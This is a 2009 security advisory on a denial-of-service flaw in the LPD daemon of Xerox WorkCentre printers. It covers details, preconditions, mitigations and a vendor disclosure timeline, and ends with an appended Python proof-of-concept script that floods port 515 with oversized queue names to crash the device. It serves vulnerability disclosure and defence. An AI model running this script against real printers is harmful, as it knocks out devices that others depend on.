# Louhi Networks Information Security Research# Security Advisory# # # Advisory: Xerox WorkCentre multiple models Denial of Service# Release Date: 2009/08/25# Last Modified: 2009/08/25# Authors: Juho Ranta# [juho.ranta@louhi.fi]# Henri Lindberg, CISA# [henri.lindberg@louhi.fi]# # Application: Xerox WorkCentre# Verified: Controller+PS ROM Version 1.202.1 and 1.202.5# Devices: Xerox WorkCentre 7132,# WC7232/7242, WC7328/7335/7345/7346 and# WC7425/28/35# Attack type: Denial of Service# Risk: Low# Vendor Status: Patch available for WC7232/7242# References: http://www.louhinetworks.fi/advisory/xerox_0908.txt# # http://www.cert.fi/haavoittuvuudet/2009/haavoittuvuus-2009-081.html# # http://www.support.xerox.com/go/results.asp?Xtype=download&prodID=WC7232_WC7242&Xlang=en_US&Xcntry=USA# # # Overview# # Quote from http://www.xerox.com/# "The Xerox WorkCentre 7132 multifunction is the affordable transition# to the next level of productivity for your office. One easy-to-use# device offers powerful printing, copying, scanning, and faxing. The# WorkCentre 7132 also gives you color when you need it, for critical# documents and for added impact. Robust functions, straightforward# operation, and color within your budget . that should keep everyone# smiling and productive."# # During a brief assessment performed for Xerox WorkCentre 7132 it was# discovered that LPD daemon implementation contains a weakness# related to robustness of LPD protocol handling. Attacker can crash# the whole device with a relatively simple attack. Recovering from# the denial-of-service condition requires power cycling the device.# # Details# # Device freezes when it is flooded with LPD requests having oversized# queue name length AND other features of the device are accessed# during the attack.# # The LPD daemon terminates the connection when it receives a request# with an oversized queue name. The required minimum length for this# seems to vary. Our proof-of-concept attack sends ASCII character# blocks to the LPD daemon until connection is closed, while sending# HTTP requests to the web administration interface.# # By flooding the device with these invalid LPD requests and accessing# other features at the same time, the device can be crashed. This was# verified with two different firmware versions (1.202.1 and 1.202.5).# # It must be noted that successful denial-of-service attack requires# the steps described above. Sending requests with oversized queue# names does crash the device by itself.# # Due to the black box nature of the performed attack against a# production device, we were not able to determine the exact root# cause for the crash. According to vendor this is caused by a memory# leak, but further exploitability or memory corruption has neither# been confirmed nor denied.# # Vulnerability was detected with an LPD protocol implementation# written for Sulley Fuzzing Framework.# # # Preconditions# # *LPD daemon is enabled.# *Attacker has network access to the LPD daemon# *Attacker has network access to other features OR# *Valid user uses the device on location# # # Symptoms of successful attack# # One or more of the following:# *Control panel lights are blinking, no response to pushing buttons# *LCD panel displays error message# *LCD panel displays a halted progress bar# *Switching power off from on/off button takes more than 10 seconds# # Proof of Concept:# # Python code available at:# http://www.louhinetworks.fi/advisory/xerox/exploit.py# http://www.louhinetworks.fi/advisory/xerox/webInterface.py# # Pictures of a crashed control panel (Finnish language):# http://www.louhinetworks.fi/advisory/xerox/error1.jpg# http://www.louhinetworks.fi/advisory/xerox/freeze1.jpg# # Web interface requests are performed with a separate Python# process/script in order to achieve more reliable exploitation under# Windows.# # Mitigation:# # Preventive# *Install patch from vendor# *Configure IPS signature for LPD requests with oversized queue# names# *Allow only trusted users to access LPD daemon# *Disable LPD daemon# # Detective# *Configure IDS signature for LPD requests with oversized queue# names# # Disclosure Timeline (selected dates):# # X 2008 - Vulnerability discovered# 3. September 2008 - Contacted CERT-FI by email describing the# issue with Xerox WC 7132# 20. November 2008 - CERT-FI confirms vendor has been notified# 21. January 2009 - Vendor is unable to reproduce the issue,# but continues trying# 22. January 2009 - Vulnerability reproduced, vendor investigates# other devices. Apologizes slow response.# 17. June 2009 - Vendor has identified vulnerable devices,# patch due in July.# 20. August 2009 - Patch available for download (only# WC7232/7242)# 25. August 2009 - Advisory released# # A Big Thank You to CERT-FI's Vulnerability Coordination for persistent# coordination effort.# # Copyright 2009 Louhi Networks Oy. All rights reserved. No warranties,# no liabilities, information provided 'as is' for educational purposes.# Reproduction allowed as long as credit is given. Information wants to# be free.import socket
import sys
import os
import httplib
import signal
iflen(sys.argv)<2:print("Usage: python exploit.py printerIpAddress")print("After the script is started, execute the webInterface.py script")
sys.exit(0)
ipAddress = sys.argv[1]
i =0whileTrue:
i +=1try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ipAddress,515))except:# If the connection fails, printer has crashedprint("Unable to connect")
sys.exit(0)# Send receive a printer job -command. Queue name will be as long as# possible. The printer will disconnect when the queue name has reached it's# maximum length
s.send("\x02")
j =0whileTrue:
j +=1
s.send("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")print(str(i)+"."+str(j))
s.close()print(i)# milw0rm.com [2009-08-25]
